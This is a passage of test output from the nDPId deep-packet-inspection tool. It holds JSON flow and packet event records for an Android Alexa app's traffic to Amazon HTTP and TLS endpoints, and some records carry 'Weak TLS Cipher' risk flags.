+00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076275,"flow_last_seen":1490976076341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976076341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976080485,"flow_last_seen":1490976080485,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976080485,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1490976080485,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080485,"pkt":"AMDKkaPvePiC0\/vCCABFAAA80qBAAEAGOXysECrYIsc08JYEAbs8Ao8fAAAAAKAC\/\/9XyQAAAgQFtAQCCAoA9l2\/AAAAAAEDAwg="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":2,"flow_last_seen":1490976080542,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976080542,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7lgTyw5w6PAKPIKASaN+a6gAAAgQFtAQCCApEF4DYAPZdvwEDAwg="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_packet_id":3,"flow_last_seen":1490976080543,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976080543,"pkt":"AMDKkaPvePiC0\/vCCABFAAA00qFAAEAGOYOsECrYIsc08JYEAbs8Ao8g8sOcO4AQAVcxOQAAAQEICgD2XcZEF4DY"} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1144,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976080485,"flow_last_seen":1490976080544,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976080544,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1146,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976080485,"flow_last_seen":1490976080606,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1708,"flow_avg_l4_payload_len":284,"midstream":0,"thread_ts_msec":1490976080606,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01328{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976080485,"flow_last_seen":1490976080607,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3649,"flow_avg_l4_payload_len":456,"midstream":0,"thread_ts_msec":1490976080607,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082723,"flow_last_seen":1490976082723,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082723,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1490976082723,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082723,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8n\/hAAEAGdDKsECrYNu8YuoUFAbsbksFnAAAAAKAC\/\/9eHgAAAgQFtAQCCAoA9l6fAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082964,"flow_last_seen":1490976082964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082964,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1490976082964,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082964,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8NvRAAEAG3TasECrYNu8YuoUGAbttlGhMAAAAAKAC\/\/9lHQAAAgQFtAQCCAoA9l64AAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1490976082969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976082969,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwftZAAOcG7l827xi6rBAq2AG7hQU1exHsG5LBaHASH\/6SVwAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1490976082973,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976082973,"pkt":"AMDKkaPvePiC0\/vCCABFAAAon\/lAAEAGdEWsECrYNu8YuoUFAbsbksFoNXsR7VAQAVfcyAAA"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976082723,"flow_last_seen":1490976082975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976082975,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1490976083245,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976083245,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWypAAOcGEgw27xi6rBAq2AG7hQaUlSPBbZRoTXASH\/4ogAAAAgQFtAEDAwY="} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1176,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082723,"flow_last_seen":1490976083245,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976083245,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1177,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1490976083337,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976083337,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNvVAAEAG3UmsECrYNu8YuoUGAbttlGhNlJUjwlAQAVdy8QAA"} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085644,"flow_last_seen":1490976085644,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085644,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1490976085644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085644,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8I8hAAEAGIyesECrYNF7ohrKHAbtpd3wLAAAAAKAC\/\/9ZswAAAgQFtAQCCAoA9l\/DAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085829,"flow_last_seen":1490976085829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085829,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1196,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1490976085829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085829,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8qZ1AAEAGnVGsECrYNF7ohrKIAbvGQPZJAAAAAKAC\/\/+CmQAAAgQFtAQCCAoA9l\/UAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085832,"flow_last_seen":1490976085832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085832,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1490976085832,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085832,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8k2FAAEAGs42sECrYNF7ohrKJAbv5cMy2AAAAAKAC\/\/94+AAAAgQFtAQCCAoA9l\/XAAAAAAEDAwg="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085883,"flow_last_seen":1490976085883,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085883,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1198,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1490976085883,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085883,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/VAAEAGPiSsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/94MQAAAgQFtAQCCAoA9l\/cAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085884,"flow_last_seen":1490976085884,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085884,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45707,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1199,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1490976085884,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085884,"pkt":"AMDKkaPvePiC0\/vCCABFAAA83c5AAEAGaSCsECrYNF7ohrKLAbvdeYISAAAAAKAC\/\/\/fjAAAAgQFtAQCCAoA9l\/cAAAAAAEDAwg="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085891,"flow_last_seen":1490976085891,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085891,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1200,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1490976085891,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085891,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8K1lAAEAGbNGsECrYwKgLAZYiH5Cn8nSEAAAAAKAC\/\/9ycAAAAgQFtAQCCAoA9l\/dAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHsZAAOcGgTQ0XuiGrBAq2AG7sofzK0GgaXd8DHASH\/6hqwAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwdw1AAOcGKO00XuiGrBAq2AG7sojjQR2VxkD2SnASH\/7+lwAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1490976085977,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085977,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoI8lAAEAGIzqsECrYNF7ohrKHAbtpd3wM8ytBoVAQAVfsHAAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1204,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085644,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqZ5AAEAGnWSsECrYNF7ohrKIAbvGQPZK40EdllAQAVdJCQAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085829,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1490976085978,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QliIAAAAAp\/J0hVAUAAA7FAAAAAAAAAAA"} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1208,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085644,"flow_last_seen":1490976086218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSbFAAOcGVkk0XuiGrBAq2AG7soktOgAj+XDMt3ASH\/7IcwAAAgQFtAEDAwY="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHTJAAOcGgsg0XuiGrBAq2AG7sosHecze3XmCE3ASH\/6IEgAAAgQFtAEDAwY="} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1212,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085829,"flow_last_seen":1490976086218,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 